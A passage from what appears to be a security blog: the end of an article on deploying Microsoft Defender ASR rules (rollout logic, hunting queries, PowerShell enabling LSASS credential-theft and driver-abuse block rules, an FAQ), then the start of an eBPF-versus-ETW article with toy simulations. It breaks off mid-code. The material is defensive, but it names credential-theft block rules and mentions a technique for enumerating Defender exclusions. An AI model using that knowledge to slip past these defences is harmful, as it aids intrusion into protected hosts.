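  "75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84", // Office code injection
]);

// Next rung for a rule, or stay put while false positives exceed the threshold.
function nextMode(guid, current, falsePositives, maxFalsePositives = 0) {
  if (falsePositives > maxFalsePositives) return current; // tune exclusions first
  const skipWarn = NO_WARN.has(guid.toLowerCase());
  switch (current) {
    case "Audit": return skipWarn ? "Block" : "Warn";
    case "Warn": return "Block";
    default: return current; // Block is the top rung
  }
}

console.log(nextMode("d4f940ab-401b-4efc-aadc-ad5f3c50688a", "Audit", 0)); // Warn
console.log(nextMode("75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84", "Audit", 0)); // Block
console.log(nextMode("d4f940ab-401b-4efc-aadc-ad5f3c50688a", "Warn", 3));  // Warn
```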

Step 3 -- Hunt with the universal query

DeviceEvents | where ActionType startswith "Asr" returns every Audit and Block emission across the fleet. Pair it with DeviceProcessEvents and DeviceFileEvents for the corroborating edge data; the Section 6 code example demonstrates the shape. For the one rule without a DeviceEvents row, Block Webshell creation for Servers, use Sysmon Event ID 11 in web roots plus IIS access logs [@ms-learn-asr-reference]. Microsoft Learn's operationalize page is the corresponding canonical reference for post-deployment monitoring practices [@ms-learn-asr-deployment-operationalize].
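Pairing an ASR row with its corroborating process events is a time-window join on the device. The sketch below mimics that join over mocked rows. It assumes the `Timestamp`, `DeviceName`, `ActionType`, `FileName`, and `InitiatingProcessFileName` columns of the Advanced Hunting schema. The row values and the 60-second default window are invented; in a real tenant you would express the same join in KQL.

```javascript
// Mocked rows; column names follow the DeviceEvents / DeviceProcessEvents schema.
const asrAlerts = [
  { Timestamp: "2026-05-04T09:15:02Z", DeviceName: "WS-FIN-042", ActionType: "AsrOfficeChildProcessBlocked",
    FileName: "cmd.exe", InitiatingProcessFileName: "WINWORD.EXE" },
];
const processRows = [
  { Timestamp: "2026-05-04T09:14:40Z", DeviceName: "WS-FIN-042", FileName: "WINWORD.EXE", InitiatingProcessFileName: "explorer.exe" },
  { Timestamp: "2026-05-04T09:20:00Z", DeviceName: "WS-FIN-042", FileName: "notepad.exe", InitiatingProcessFileName: "explorer.exe" },
  { Timestamp: "2026-05-04T09:15:00Z", DeviceName: "WS-ENG-003", FileName: "WINWORD.EXE", InitiatingProcessFileName: "explorer.exe" },
];

// For each ASR row, collect process events on the same device within +/- windowSec.
function corroborate(asr, procs, windowSec = 60) {
  return asr.map(a => {
    const t = Date.parse(a.Timestamp);
    const nearby = procs.filter(p =>
      p.DeviceName === a.DeviceName &&
      Math.abs(Date.parse(p.Timestamp) - t) <= windowSec * 1000);
    return { ...a, nearby: nearby.map(p => `${p.InitiatingProcessFileName} -> ${p.FileName}`) };
  });
}

for (const row of corroborate(asrAlerts, processRows)) {
  console.log(row.ActionType, row.nearby); // AsrOfficeChildProcessBlocked [ 'explorer.exe -> WINWORD.EXE' ]
}
```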

Step 4 -- Layer with the sibling controls

ASR alone is not a complete posture. The set of controls that compose with ASR includes:

Tamper Protection [@ms-learn-tamper-protection] -- prevents administrators (and attackers with admin rights) from disabling ASR rules at runtime through registry or service tampering.
Cloud Protection (MAPS) -- required for several rules including the prevalence-based executable rule and the ransomware advanced-protection rule [@ms-learn-asr-reference].
The Microsoft 365 Apps macros-from-the-internet-blocked-by-default policy [@ms-learn-internet-macros-blocked] [@ms-techcommunity-internet-macros-2022] -- the consumer-facing twin of ASR's Office rules; default-on for every Microsoft 365 tenant since the July 2022 staged rollout.
The Vulnerable Driver Blocklist [@ms-learn-driver-block-rules] -- default-on in Windows 11 22H2; sibling to the BYOVD ASR rule at the kernel-load edge.
EDR-in-block-mode [@ms-learn-edr-in-block-mode] -- only when Defender Antivirus is in passive mode (third-party AV is primary).
Sysmon -- for visibility into edges ASR does not block and for audit-trail corroboration of edges it does. (M1040 nominates ASR per-technique [@mitre-m1040]; M1042 does not mention Sysmon or ASR by name [@mitre-m1042] -- the pairing is practitioner consensus, not an M1042 nomination.)

Step 5 -- Track exclusions in source control

The exclusion list is the most common deployment-failure surface. Adding C:\Program Files\Vendor\ as an exclusion for one rule applies fleet-wide; over-broad exclusions are the dominant practical risk to the layer's integrity. Use Git or equivalent; review exclusions every quarter; demand a Jira ticket per exclusion with a sunset date.
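One way to make the sunset-date rule enforceable is a CI check over the exclusion file kept in source control. The sketch assumes a hypothetical one-entry-per-line format, `path | ticket | sunset (YYYY-MM-DD)`; neither the format nor the check is a Microsoft feature. It flags three kinds of entry:

- entries with no ticket
- entries past their sunset date
- folder or wildcard paths that look over-broad

```python
from datetime import date

# Hypothetical exclusions file kept in Git: path | ticket | sunset date.
EXCLUSIONS = """\
C:\\Program Files\\Vendor\\agent.exe | SEC-1042 | 2026-09-30
C:\\Program Files\\Vendor\\ | SEC-0977 | 2025-12-31
C:\\Tools\\*.exe |  | 2026-12-31
"""


def audit(text: str, today: date) -> list[str]:
    """Return one human-readable finding per problem found."""
    findings = []
    for line in text.splitlines():
        path, ticket, sunset = (field.strip() for field in line.split("|"))
        if not ticket:
            findings.append(f"{path}: no ticket")
        if date.fromisoformat(sunset) < today:
            findings.append(f"{path}: expired {sunset}")
        if path.endswith("\\") or "*" in path:
            findings.append(f"{path}: over-broad (folder or wildcard)")
    return findings


for finding in audit(EXCLUSIONS, date(2026, 6, 1)):
    print(finding)
```

A non-empty findings list can fail the pipeline, which turns the quarterly review from a calendar reminder into a merge gate.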

Note: (1) Enable BYOVD, LSASS, and WMI persistence in Block mode (Standard protection -- start here). (2) Move the other sixteen rules through Audit, Warn (where supported), and Block. (3) Hunt with DeviceEvents | where ActionType startswith "Asr". (4) Layer with Tamper Protection, Cloud Protection, the Microsoft 365 Apps macro default block, the Vulnerable Driver Blocklist, EDR-in-block-mode (for passive AV), and Sysmon. (5) Track exclusions in source control with sunset dates.

Note: Exclusions added to one ASR rule apply fleet-wide. Over-broad exclusions are the dominant practical attack surface against an otherwise well-configured ASR posture. Adam Svoboda's published technique demonstrates that low-privilege users can enumerate the exclusion list directly from Defender's VDM containers [@adamsvoboda-asr-exclusions]. Track exclusions in source control. Review quarterly. Require a ticket with a sunset date for every entry.

If LSA Protection (RunAsPPL) is enabled on the device, the LSASS ASR rule shows as "not applicable" because LSA Protection already enforces the same boundary at a different layer [@ms-learn-asr-overview]. Confused defenders sometimes interpret the "not applicable" state as a rule misconfiguration; it is in fact the correct behaviour, and means the host is already protected against the equivalent class of attacks by LSA Protection plus Credential Guard.

```powershell
# Run from an elevated PowerShell session.
# Set-MpPreference replaces any existing ASR rule list; Add-MpPreference appends to it.
Set-MpPreference -AttackSurfaceReductionRules_Ids `
    '56a863a9-875e-4185-98a7-b882c64b5ce5', `
    '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2', `
    'e6db77e5-3df2-4cf1-b95a-636979351e5b' `
    -AttackSurfaceReductionRules_Actions Enabled, Enabled, Enabled

# Confirm the configured rule IDs (their modes are in AttackSurfaceReductionRules_Actions).
Get-MpPreference | Select-Object -ExpandProperty AttackSurfaceReductionRules_Ids
```

Run as administrator. The three GUIDs are BYOVD, LSASS, and WMI persistence respectively. Confirm with the Get-MpPreference call. For staged rollout in an enterprise, manage these through Intune or Group Policy instead so the configuration follows the device.

Five steps, three Standard protection rules, sixteen Other ASR rules, two rules that skip Warn mode, one universal hunting query. The rest is exception-list discipline. Section 11 closes with the seven misconceptions that survive every rollout.

11. Frequently Asked Questions

Do ASR rules require Microsoft Defender for Endpoint?

No. ASR rules live inside **Microsoft Defender Antivirus** -- the on-host scanning engine that ships free with every Windows edition that includes Defender. **Microsoft Defender for Endpoint** is the cloud-managed EDR layer Microsoft sells on top, with `DeviceEvents` Advanced Hunting, Indicators of Compromise management, and automated investigation. ASR rules can be configured locally via PowerShell or Group Policy with no Defender for Endpoint licence at all. Defender for Endpoint adds management, telemetry ingestion, and Advanced Hunting; it does not add the enforcement [@ms-learn-asr-reference] [@ms-learn-edr-in-block-mode].

Is there a single generic ASR ActionType to hunt on?

No. This is the SOC-playbook folklore that survives every rollout. Each rule emits its own rule-specific pair of ActionType values, one ending in `Audited` and one ending in `Blocked` (the server-only Webshell rule is the only exception, with no `DeviceEvents` row at all). The canonical universal Advanced Hunting query is `DeviceEvents | where ActionType startswith "Asr"`, not equality against a generic value. Microsoft Learn's rules reference enumerates every pair [@ms-learn-asr-reference].

Did ASR end the Office macro era on its own?

No. The Office macro era ended through three layers in combination: (1) **Europol's Operation LadyBird** on January 27, 2021, the coordinated international takedown of Emotet's command-and-control infrastructure [@europol-emotet-disrupted-wayback]; (2) **ASR's 2017-onward Office rules at the enterprise tier**, managed through Intune, Group Policy, or Defender for Endpoint; (3) **the Microsoft 365 Apps internet-macro default block at the consumer and tenant tier**, announced by Tom Gallagher on February 7, 2022 and resumed July 20, 2022 after a brief pause for usability fixes [@ms-techcommunity-internet-macros-2022]. ASR is the enterprise-managed layer. It was not the only layer. The honest version of the story names all three.

Is ASR a kernel-mode control?

Partially yes, and the nuance matters. The interception point (`WdFilter.sys`, registered at altitude 328010 in the FSFilter Anti-Virus band per the IFS allocated-altitudes reference [@ms-learn-ifs-allocated-altitudes]) is **kernel-mode**. The policy evaluation (`MsMpEng.exe`) is **user-mode** at integrity level System. Calling ASR "kernel-mode" without nuance is incomplete; the correct one-line framing is "kernel-mediated interception, user-mode policy evaluation."

Does "not applicable" on the LSASS rule mean it is misconfigured?

No. Microsoft Learn's overview page states verbatim: "If you enabled Local Security Authority (LSA) protection (recommended, along with Credential Guard), this rule is redundant" [@ms-learn-asr-overview]. The LSASS ASR rule shows as "not applicable" on devices where LSA Protection is enabled. The "not applicable" state is the correct behaviour, not a misconfiguration.

Do five ASR rules skip Warn mode?

No. Only two ASR rules skip Warn mode -- "Block credential stealing from the Windows local security authority subsystem" and "Block Office applications from injecting code into other processes" -- both per Microsoft Learn's overview page [@ms-learn-asr-overview]. Section 4 Generation 3 walks the byte-level proof that the rest of the catalogue does support Warn, including the Safe Mode reboot rule and the copied-tools rule, two of the five rules the folklore wrongly lists.

Does the SOC ever see ASR activity?

Yes -- routinely. The "the SOC never sees ASR" framing is rhetoric, not reality. Multiple rules raise EDR alerts in Defender for Endpoint; every rule except the Webshell rule lands a row in `DeviceEvents` [@ms-learn-asr-reference]. The accurate framing is that ASR blocks rarely require analyst response because there is nothing left to triage once the kernel has returned the operation as failed -- the Frankfurt analyst from this article's opening never gets paged because the macro never spawned PowerShell. The SOC can hunt, audit, and report on ASR activity at any time; the choice not to triage individual blocks is exactly what a well-tuned preventive layer ought to enable.

Nine years, seven generations, nineteen rules, one structural pivot from nodes to edges, and the same Cohen-1984 ceiling that every behaviour-block list inherits. The Frankfurt analyst from this article's opening never knew the macro fired -- because the kernel made sure nothing happened. That is the article in one sentence: a quiet layer that converts a credential-stealing-banking-trojan-turned-loader campaign into a single-row telemetry event the SOC routinely ignores, by classifying edges instead of nodes.

eBPF vs ETW: Two Generations of Kernel Observability

noreply@paragmali.com (Parag Mali) — Sat, 16 May 2026 00:00:00 GMT

**ETW (Windows 2000) is event emission only.** Per-CPU lock-free ring buffers, manifest-defined providers, kernel-mediated dispatch. Sessions filter by provider, keyword, and level; every enabled event is fully serialized and crosses the kernel/user boundary.

eBPF (Linux 2014) inverts the model. The consumer ships verified bytecode into the kernel; programs filter and aggregate at the hook site before any data crosses the boundary. JIT-compiled, with hooks across kprobe, uprobe, tracepoint, XDP, TC, and LSM.

The verifier is the trust boundary -- and the catch. Rice's theorem says no in-kernel verifier can be simultaneously sound, complete, and decidable. Linux's verifier trades soundness in the corner cases (CVE-2023-2163 and three predecessors); PREVAIL (the verifier used by eBPF-for-Windows) trades completeness more heavily for stronger formal grounding.

eBPF-for-Windows is the first cross-OS-portable kernel-observability primitive. PREVAIL verifies in user mode, bpf2c transliterates verified bytecode to C, MSVC compiles to a signed .sys driver. Networking-subset hooks only as of 2026; full kprobe-equivalent coverage is the work in progress.

1. The SOC Analyst Sees the Same Thing Twice

A Security Operations Center analyst opens two Sysmon/Operational event channels side by side. One channel is streaming from a Red Hat Enterprise Linux host; the other is streaming from a Windows Server 2022 domain controller. The XML configuration is the same. The Event IDs are the same. A ProcessCreate record from either host carries the same Image, CommandLine, ParentImage, IntegrityLevel, and Hashes fields. Detection rules written against one channel match the other. To the analyst, the two operating systems are interchangeable.

Underneath, they are not even close.

On the Windows side, every event was emitted by a kernel provider -- Microsoft-Windows-Sysmon, Microsoft-Windows-Threat-Intelligence, Microsoft-Windows-Kernel-Process -- before the Sysmon user-mode service ever ran its XML filter. The kernel produced a fully formatted event, dropped it into a per-CPU ring buffer, and let user space pick it up. Every enabled event made the kernel-to-user trip in full. The filter inside Sysmon's user-mode service is what kept the on-disk log small. The wire between the kernel and the consumer carried the full firehose.

On the Linux side, no kernel module owned by Microsoft is running. Sysmon for Linux instead attaches to roughly twenty Linux kernel probes through the SysinternalsEBPF library [@github-com-microsoft-sysmonforlinux]. Each probe is an eBPF program: bytecode that was compiled by clang, verified by the kernel before load, JIT-compiled to native instructions, and attached to a hook inside the kernel [@ebpf-io-is-ebpf]. When execve fires, the verified program runs on the producing CPU, reads its arguments out of the kernel context, decides whether the call matches the XML configuration's predicates, and only then writes a record into a ring buffer. The events that arrive in user space were already filtered inside the kernel. The wire carries only what the configuration cares about.

The output channels match because Sysmon for Linux is engineered to look exactly like Sysmon for Windows [@github-com-microsoft-sysmonforlinux]. The substrate underneath is engineered for two different decades. ETW is from 2000. eBPF is from 2014. The fourteen-year gap shows up not in features but in how the kernel does its job.

Key idea: ETW emits. eBPF computes. That gap is the entire generation difference. Everything else in this article is a consequence of it.
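A toy model makes the difference concrete. The sketch below is a simulation, not either API. It generates synthetic process-creation records, then counts how many cross a simulated kernel/user boundary in two cases:

- the predicate runs in user mode after the crossing (the ETW shape)
- the predicate runs at the hook before the crossing (the eBPF shape)

The record fields and the `/tmp/` predicate are hypothetical.

```python
IMAGES = ["/usr/sbin/cron", "/usr/bin/ls", "/tmp/.x", "/usr/bin/ssh"]

# Synthetic stream of process-creation records produced by the "kernel".
events = [{"pid": i, "image": IMAGES[i % len(IMAGES)]} for i in range(10_000)]


def interesting(ev: dict) -> bool:
    """The predicate the detection configuration actually cares about."""
    return ev["image"].startswith("/tmp/")


# ETW shape: every enabled event crosses, then user mode filters.
etw_crossed = list(events)
etw_kept = [ev for ev in etw_crossed if interesting(ev)]

# eBPF shape: the predicate runs at the hook; only matches cross.
ebpf_crossed = [ev for ev in events if interesting(ev)]

print(len(etw_crossed), len(ebpf_crossed), etw_kept == ebpf_crossed)  # 10000 2500 True
```

Both shapes deliver the same final answer. They differ only in how much data paid the boundary-crossing cost to get there.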

This article is about why those two designs exist, why the second one is strictly more powerful, why "strictly more powerful" cost the Linux kernel a new class of CVE, and what Microsoft's microsoft/ebpf-for-windows [@github-com-for-windows] project -- now in its sixth year of development -- reveals about which design wins at the point of convergence. By the end you will know both substrates well enough to choose between them, understand their failure modes, and see why "two generations" is not marketing language but a literal description of the engineering arc.

2. A Tale of Two Lineages

In 1992, Van Jacobson and Steven McCanne at Lawrence Berkeley Laboratory wrote a small virtual machine for packet filtering [@tcpdump-org-bpf-usenix93pdf]. In 2000, a separate Microsoft team shipped a kernel event bus inside Windows 2000. Neither group knew the other existed. Each was solving a different version of the same problem: how do you watch the kernel from user space without owning the kernel?

The two answers ran in parallel for twenty-two years before they collided.

1992 -- The BSD Packet Filter. McCanne and Jacobson published "The BSD Packet Filter: A New Architecture for User-level Packet Capture" at USENIX Winter 1993, describing work that landed in 4.3BSD-Reno earlier in 1992. The motivation was painfully concrete: tcpdump was copying every packet through the kernel-user boundary, then discarding the ones the user did not want. BPF moved that filter into the kernel. A tiny two-register, 32-bit virtual machine evaluated a user-supplied predicate against each packet before any copy; only matching packets crossed into user space. The architectural insight that would survive thirty years is one sentence: filter where the data is produced, not where it is consumed.
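To make "a tiny virtual machine evaluating a predicate against each packet" concrete, here is a minimal interpreter for three classic BPF instructions:

- load a 16-bit halfword at an absolute offset (`BPF_LD|BPF_H|BPF_ABS` = 0x28)
- jump if equal to a constant (`BPF_JMP|BPF_JEQ|BPF_K` = 0x15)
- return a constant (`BPF_RET|BPF_K` = 0x06)

Everything else is omitted, including the X register and the rest of the instruction set. The program mirrors what `tcpdump -d ip` prints: accept frames whose EtherType is IPv4. The accept length 262144 is tcpdump's usual default snap length and may differ on your system.

```python
import struct

# Classic BPF instruction: (code, jt, jf, k), as in struct sock_filter.
LDH_ABS = 0x28  # A <- 16-bit halfword at packet[k]
JEQ_K = 0x15    # if A == k: pc += jt, else pc += jf (relative to next insn)
RET_K = 0x06    # return k: bytes to accept, 0 means drop

ACCEPT_IPV4 = [
    (LDH_ABS, 0, 0, 12),      # EtherType lives at offset 12
    (JEQ_K, 0, 1, 0x0800),    # IPv4?
    (RET_K, 0, 0, 262144),    # accept
    (RET_K, 0, 0, 0),         # drop
]


def run(prog, packet: bytes) -> int:
    a = 0   # accumulator
    pc = 0  # program counter
    while True:
        code, jt, jf, k = prog[pc]
        pc += 1
        if code == LDH_ABS:
            if k + 2 > len(packet):
                return 0  # out-of-bounds load: treat as drop
            (a,) = struct.unpack_from(">H", packet, k)  # network byte order
        elif code == JEQ_K:
            pc += jt if a == k else jf
        elif code == RET_K:
            return k
        else:
            raise ValueError(f"unsupported opcode {code:#x}")


ipv4_frame = bytes(12) + b"\x08\x00" + bytes(20)
arp_frame = bytes(12) + b"\x08\x06" + bytes(28)
print(run(ACCEPT_IPV4, ipv4_frame), run(ACCEPT_IPV4, arp_frame))  # 262144 0
```

A return of 0 means the ARP frame is never copied to user space, which was the point of the 1992 design.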

eBPF (extended BPF). A safe, sandboxed virtual machine inside the Linux kernel that runs user-supplied programs at attached hook points. Programs are written in restricted C, compiled to a 64-bit RISC-style bytecode, statically verified before load, and JIT-compiled to native code. The "extended" version, introduced in Linux 3.18 (December 2014) [@kernel-org-bpf-indexhtml], generalized BPF from a packet-filter language into a general kernel-extensibility mechanism.

2000 -- Event Tracing for Windows. Microsoft shipped ETW with Windows 2000. The reference portal [@learn-microsoft-com-tracing-portal] describes the design Microsoft had been refining since the late 1990s: a kernel-mediated event bus with three roles -- providers, sessions, and consumers -- and per-CPU lock-free ring buffers. ETW's architectural insight was the inverse of BPF's: event identity and causal order are first-class. A kernel-mediated dispatch makes them cheap. A tcpdump filter wants to throw events away. A security telemetry system wants to keep them, attribute them, and order them.

Event Tracing for Windows (ETW). A kernel-mediated tracing facility shipped in Windows 2000. Providers (kernel or user-mode components) emit structured events to per-CPU ring buffers; sessions own the buffers and select which providers to enable at which level; consumers receive the event stream either in real time or by reading the on-disk `.etl` log. ETW is documented at `learn.microsoft.com/.../etw/event-tracing-portal` [@learn-microsoft-com-tracing-portal].

2003-2005 -- DTrace. Bryan Cantrill, Mike Shapiro, and Adam Leventhal at Sun Microsystems started work in 2003 on what would become the first production-grade dynamic tracing system. DTrace shipped publicly in Solaris 10 in January 2005 [@en-wikipedia-org-wiki-dtrace] and was quickly ported to FreeBSD and macOS. Its central idea -- safe in-kernel scripts attached to probes, with a single language for tracing the entire system -- is the spiritual ancestor of every modern kernel observability tool, including eBPF. (Wikipedia gives DTrace's initial public release as January 2005, with Sun's internal development starting around 2003. The "DTrace 2003" claim that appears in some retrospectives conflates project inception with public release; we use the 2005 ship date here and note 2003 only as a development start.) Linux could not adopt DTrace directly: it is licensed under the CDDL, which is GPLv2-incompatible.

2005 -- SystemTap. Red Hat attempted to fill the Linux DTrace gap with SystemTap [@sourceware-org-systemtap]. The architectural compromise that doomed it: SystemTap scripts compile to a kernel module, loaded at runtime. Loading user-supplied kernel modules on demand is a privileged operation by definition, so production SystemTap deployments restricted use to local root. That undercut the observability use case: if you already have root, you can use any debugging tool. SystemTap survives as a niche tracing system; it did not become the Linux answer to DTrace.

1992-2014 -- classic BPF stagnates. The original BPF VM kept finding new jobs. Linux Socket Filtering [@kernel-org-networking-filtertxt] ported the BSD filter into the Linux kernel in 1997. seccomp-bpf in 2012 gave it a second job: filtering system calls for sandboxing. But the language remained a 32-bit two-register packet-filter VM. It could not be extended to general kernel observability without rewriting the instruction set architecture from the ground up.

2014 -- eBPF. Alexei Starovoitov's "extended BPF" patch series landed in Linux 3.18 in December 2014 [@kernel-org-bpf-indexhtml], described in LWN's contemporaneous article on Starovoitov's eBPF patch set [@lwn-net-articles-603983]. The rewrite was thorough: 64-bit instruction set, eleven registers, maps for in-kernel state, helper calls into kernel APIs, a JIT compiler, and -- the part that mattered most -- a kernel verifier that statically proves safety before any program runs. The verifier is what turned the packet filter into a general kernel extension mechanism. Without it, every BPF program would have to be trusted; with it, untrusted user code can execute in kernel mode.
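The 64-bit instruction set is compact enough to encode by hand. The sketch below packs the two-instruction program `r0 = 0; exit` using the basic 8-byte instruction layout standardized in RFC 9669. That layout has four fields:

- an 8-bit opcode
- 4-bit destination and source register fields
- a signed 16-bit offset
- a signed 32-bit immediate

The sketch assumes a little-endian host, where the destination register occupies the low nibble of the register byte.

```python
import struct

# Opcode building blocks: instruction class | operation | operand source.
BPF_ALU64, BPF_JMP = 0x07, 0x05
BPF_MOV, BPF_EXIT = 0xB0, 0x90
BPF_K = 0x00  # operand is the 32-bit immediate


def insn(opcode: int, dst: int = 0, src: int = 0, off: int = 0, imm: int = 0) -> bytes:
    """Encode one 8-byte eBPF instruction in little-endian layout."""
    regs = (src << 4) | dst  # dst in the low nibble, src in the high nibble
    return struct.pack("<BBhi", opcode, regs, off, imm)


# r0 = 0 (64-bit move of an immediate), then exit; r0 is the return value.
program = insn(BPF_ALU64 | BPF_MOV | BPF_K, dst=0, imm=0) + insn(BPF_JMP | BPF_EXIT)
print(program.hex())  # b7000000000000009500000000000000
```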

By the time eBPF shipped, Windows had ETW everywhere. Linux had auditd's pull-based audit log and a handful of perf events. Then Starovoitov rewrote BPF, and the architectural balance shifted overnight. The next decade of Linux observability was built on the new instruction set. The next decade of Windows observability stayed on ETW. The two designs ran in parallel until 2021, when Microsoft announced that eBPF would also run on Windows.

flowchart LR
  A[BPF -- 1992 -- LBL]
  B[ETW -- 2000 -- Windows 2000]
  C[DTrace -- 2005 -- Solaris 10]
  D[SystemTap -- 2005 -- Red Hat]
  E[seccomp-bpf -- 2012 -- Linux 3.5]
  F[eBPF -- 2014 -- Linux 3.18]
  G[BPF Trampoline -- 2019 -- Linux 5.5]
  H[BPF Ringbuf -- 2020 -- Linux 5.8]
  I[eBPF for Windows -- 2021 -- Microsoft]
  J[RFC 9669 BPF ISA -- 2024 -- IETF]
  A --> B --> C --> D --> E --> F --> G --> H --> I --> J

The diagram lays the substrate stories side by side. Each arrow is an architectural decision that constrained what came after. The next two sections walk each design end to end -- ETW first, because it is older and emission-only and easier to internalize.

3. ETW: Pure Event Emission

A natural question that turns out to be the wrong one: why didn't Microsoft just keep extending performance counters? By the late 1990s, Windows already had a mature counter facility -- perfmon, the Windows Performance Counters portal [@learn-microsoft-com-counters-portal]. It exposed CPU percentage, page-fault rate, queue lengths, and hundreds of other scalar metrics. If you wanted to know how loaded your system was, perfmon told you.

It also told you almost nothing useful for security telemetry.

Three structural failures of the counter model show up the moment you try to use it as the substrate for an EDR.

Sampling-rate floor. A counter can only be observed at the rate the consumer queries. On a busy host -- sshd children, container init forks, a CI runner -- process-creation rates routinely exceed any sane query rate. The counter aggregates the events it cannot expose into a single integer that hides the structure of what happened.
No identity. "Three hundred process creations in the last second" is a counter. "User bob ran /tmp/.x with parent /usr/sbin/cron at 14:33:07.221Z" is an event. The security model requires identity; the counter model erases it.
No causal order. Two counters sampled in sequence are not causally ordered with respect to the system events they describe. ETW's per-CPU buffers with QPC timestamps preserve causal order across CPUs to within the timer's accuracy.
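A few lines of Python show what the counter model throws away. The event records below are hypothetical. The aggregate answers "how many?", while only the event list answers "who, what, and which parent?". An aggregate can always be recomputed from events, but never the reverse.

```python
from collections import Counter

# Hypothetical process-creation events, as an event bus would deliver them.
events = [
    {"ts": "14:33:07.221Z", "user": "bob", "image": "/tmp/.x", "parent": "/usr/sbin/cron"},
    {"ts": "14:33:07.305Z", "user": "root", "image": "/usr/bin/ls", "parent": "/bin/bash"},
    {"ts": "14:33:07.410Z", "user": "alice", "image": "/usr/bin/ssh", "parent": "/bin/bash"},
]

# Counter model: one integer per sampling interval; identity is gone.
process_creations_per_interval = len(events)

# Event model: the security question is answerable directly...
suspicious = [e for e in events if e["image"].startswith("/tmp/")]

# ...and any aggregate can still be derived from the events.
parents = Counter(e["parent"] for e in events)

print(process_creations_per_interval)                  # 3
print(suspicious[0]["user"], suspicious[0]["parent"])  # bob /usr/sbin/cron
print(parents["/bin/bash"])                            # 2
```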

The fix was not a faster perfmon. The fix was an entirely different shape of telemetry. ETW was that shape: push-based, per-event, kernel-attributed, with stable schemas declared up front. The contrast between perfmon (a sampling counter) and ETW (an event bus) is not parametric. The two systems answer different questions. Security needs the event-bus answer.

Provider, session, consumer

ETW's data plane has three roles, every one of them a kernel-mediated object.

A provider is a kernel or user-mode component that emits a structured event, calling EventWrite from user mode or EtwWrite from kernel mode. Providers identify themselves by GUID. They declare the schema of their events ahead of time in one of three ways: classic providers via MOF; manifest-based providers via the Vista-and-later instrumentation manifest format [@learn-microsoft-com-event-tracing], compiled into the binary's WEVT_TEMPLATE resource; or TraceLogging [@learn-microsoft-com-logging-portal] for self-describing events. The schema is part of the contract: a consumer that knows the provider's manifest knows the field layout of every event the provider will ever emit.

A session is a kernel object created by StartTrace. It owns a set of per-CPU buffers and a list of enabled providers, with per-provider level and keyword masks. Sessions can write events to disk (.etl files) or be consumed in real time. (The .etl file extension stands for "Event Trace Log"; it is the on-disk format read by Windows Performance Analyzer and by tracerpt.exe for post-hoc analysis.)

A consumer is a user-mode process that calls OpenTrace and ProcessTrace and receives event callbacks. EDR agents such as Sysmon, the Microsoft Defender for Endpoint sensor [@learn-microsoft-com-defender-endpoint], and third-party agents are real-time consumers.

ETW's three-role architecture. *Providers* emit events into per-CPU ring buffers. *Sessions* are kernel objects that own buffers and select which providers to enable. *Consumers* are user-mode processes that read the buffers in real time or open the on-disk `.etl` file. The taxonomy is defined in the ETW provider documentation [@learn-microsoft-com-event-tracing].

The per-CPU ring buffer

The algorithmic core of ETW is a per-CPU lock-free ring buffer. When a provider on CPU 3 calls EventWrite, the kernel formats the event according to the provider's manifest, stamps it with a QPC timestamp, and memcpys the result into the per-CPU buffer for CPU 3. A kernel writer thread drains the buffer asynchronously into the session's destination -- either an .etl file on disk or a consumer's callback queue. The producer-side cost is constant: a function call plus a buffered memcpy, all on the local CPU, with no cross-CPU synchronization.

QueryPerformanceCounter (QPC). The Windows monotonic timestamp source used for ETW event timestamps. QPC is backed by hardware timers (TSC on modern x86, generic counter on ARM64) and provides a high-resolution counter that does not go backward.

On modern hardware, QPC guarantees monotonic timestamps per CPU. Cross-CPU ordering, however, relies on the kernel writer thread's serialization when events from different CPUs are merged into a single output stream. Per-event timestamps from different CPUs can be ordered after the fact, but the merge happens in the writer, not in the producer.
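The producer/writer split can be modelled in a few lines. This is a simulation of the shape described above, not ETW code. Each simulated CPU appends (timestamp, CPU, payload) tuples to its own list with no locking. A single writer then merges the already-sorted per-CPU lists by timestamp. The integer timestamps stand in for QPC ticks.

```python
import heapq

# One append-only buffer per CPU; producers never touch another CPU's buffer.
buffers = {cpu: [] for cpu in range(3)}


def event_write(cpu: int, qpc: int, payload: str) -> None:
    """Producer side: constant-cost append on the local CPU."""
    buffers[cpu].append((qpc, cpu, payload))


event_write(0, 100, "ProcessStart pid=42")
event_write(1, 105, "ImageLoad pid=42 ntdll.dll")
event_write(0, 110, "ThreadStart pid=42")
event_write(2, 103, "FileCreate pid=7")

# Writer side: each buffer is already in timestamp order (QPC is monotonic
# per CPU), so a k-way merge yields one globally ordered stream.
merged = list(heapq.merge(*buffers.values()))
for qpc, cpu, payload in merged:
    print(qpc, cpu, payload)
```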

flowchart LR
  P1[Provider on CPU 0]
  P2[Provider on CPU 1]
  P3[Provider on CPU 2]
  B0[Per-CPU buffer 0]
  B1[Per-CPU buffer 1]
  B2[Per-CPU buffer 2]
  W[Kernel writer thread]
  S[Session]
  F[.etl file]
  C[Real-time consumer]
  P1 -- EventWrite --> B0
  P2 -- EventWrite --> B1
  P3 -- EventWrite --> B2
  B0 --> W
  B1 --> W
  B2 --> W
  W --> S
  S --> F
  S --> C

The cost story

Microsoft's reference portal [@learn-microsoft-com-tracing-portal] describes ETW as "high-volume, low-overhead." That qualitative claim has been the consensus practitioner finding for two decades. The most useful practical writeup is Bruce Dawson's ETW Central index [@randomascii-wordpress-com-etw-central], which links to more than forty blog posts on real ETW deployments and measurements. The honest summary, anchored to Dawson's practical experience plus the architectural reason (per-CPU lock-free buffers and a memcpy per event), is that typical telemetry configurations sit in the low single-digit-percent CPU range, and pathological "log everything" configurations can reach measurable user-visible slowdowns -- on the order of 5-10% in the worst cases. These are practitioner estimates, not benchmarked figures; the BenchmarkDotNet documentation [@benchmarkdotnet-org-configs-diagnosershtml] for the EtwProfiler diagnoser explicitly acknowledges the cost: "In order to not affect main results we perform a separate run if any diagnoser is used." The overhead is small but it is not zero.

The cost has a structural cause. ETW has no in-kernel filter. The producer pays the full event-formatting cost on every emission, and the only filter is the session's level and keyword mask. If you enable a provider, every event that provider emits flows through the buffer. Filtering happens at the consumer, in user mode, after the event has crossed the boundary.
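The session-side switch can be sketched as a predicate. The model below simplifies ETW's enablement check: an event passes when its level is at or below the session's level and its keyword bits intersect the session's MatchAnyKeyword mask. MatchAllKeyword, event filters, and the level-0 and keyword-0 special cases are omitted, and the keyword values are hypothetical. Everything that passes crosses the boundary fully formatted; the user-mode predicate then discards most of it.

```python
# ETW levels: 1 = Critical ... 4 = Informational, 5 = Verbose.
INFO, VERBOSE = 4, 5

# Hypothetical keyword bits for a process-oriented provider.
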